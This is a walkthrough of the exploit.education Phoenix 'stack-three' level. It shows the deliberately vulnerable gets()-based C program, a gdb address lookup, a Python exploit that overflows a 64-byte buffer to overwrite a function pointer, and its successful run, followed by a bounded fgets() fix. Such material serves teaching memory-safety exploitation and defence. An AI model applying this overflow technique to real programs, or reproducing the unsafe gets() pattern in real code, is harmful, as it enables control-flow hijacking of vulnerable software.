Phoenix - Stack Three

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "Welcome to " LEVELNAME ", brought to you by https://exploit.education"

char *gets(char *);

void complete_level() {
  printf("Congratulations, you've finished " LEVELNAME " :-) Well done!\n");
  exit(0);
}

int main(int argc, char **argv) {
  struct {
    char buffer[64];
    volatile int (*fp)();
  } locals;

  printf("%s\n", BANNER);

  locals.fp = NULL;
  gets(locals.buffer);

  if (locals.fp) {
    printf("calling function pointer @ %p\n", locals.fp);
    fflush(stdout);
    locals.fp();
  } else {
    printf("function pointer remains unmodified :~( better luck next time!\n");
  }

  exit(0);
}

The goal of this challenge is to overwrite fp, the function pointer stored directly after the 64-byte buffer, so that it points to the complete_level function.

$ gdb -q /opt/phoenix/amd64/stack-three
Reading symbols from /opt/phoenix/amd64/stack-three...(no debugging symbols found)...done.

gef➤  print complete_level 
$1 = {<text variable, no debug info>} 0x40069d <complete_level>

Now that we know complete_level is at 0x40069d, we can build our exploit: 64 bytes to fill the buffer, followed by that address.

Solution:

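# solve.py
import sys

from pwn import p64

buff = b"A" * 64        # fill locals.buffer exactly
buff += p64(0x40069d)   # little-endian address of complete_level, lands in locals.fp

# Write raw bytes (print() would mangle them under Python 3); gets() stops at the newline
getattr(sys.stdout, "buffer", sys.stdout).write(buff + b"\n")

$ python solve.py | /opt/phoenix/amd64/stack-three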
Welcome to phoenix/stack-three, brought to you by https://exploit.education
calling function pointer @ 0x40069d
Congratulations, you've finished phoenix/stack-three :-) Well done!
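
For comparison, an added example (not part of the original post or the exploit.education source) that keeps the challenge's struct layout but reads the line with a bounded fgets() instead of gets(), so the 72-byte input above can no longer reach fp. The names read_line_bounded and bounded_read_result are hypothetical, and the input is constructed in a temporary file.

```c
#include <stdio.h>
#include <string.h>

/* Same layout as the challenge's locals: fp sits right after buffer. */
struct locals {
  char buffer[64];
  int (*fp)(void);
};

/* Hypothetical helper: bounded replacement for gets(). Reads one line from
 * `in`, writing at most sizeof(buffer) bytes including the terminator.
 * Returns 0 if the line fit, 1 if it was truncated, -1 on EOF or error. */
int read_line_bounded(struct locals *l, FILE *in) {
  if (fgets(l->buffer, sizeof l->buffer, in) == NULL) {
    l->buffer[0] = '\0';
    return -1;
  }
  size_t n = strlen(l->buffer);
  if (n > 0 && l->buffer[n - 1] == '\n') {
    l->buffer[n - 1] = '\0';
    return 0;
  }
  /* No newline stored: the line was too long (or EOF ended it). Drain the
   * remainder so leftover bytes are not parsed as the next line. */
  int c, truncated = 0;
  while ((c = fgetc(in)) != EOF && c != '\n')
    truncated = 1;
  return truncated;
}

/* Feeds constructed input (`len` bytes of 'A' plus a newline) through the
 * bounded reader. Returns its result code, or -2 if fp was modified. */
int bounded_read_result(size_t len) {
  struct locals l;
  FILE *in = tmpfile();
  if (in == NULL) return -3;
  for (size_t i = 0; i < len; i++) fputc('A', in);
  fputc('\n', in);
  rewind(in);
  l.fp = NULL;
  int rc = read_line_bounded(&l, in);
  fclose(in);
  return l.fp == NULL ? rc : -2;
}
```

A caller would treat a return value of 1 as rejected input rather than processing the truncated line.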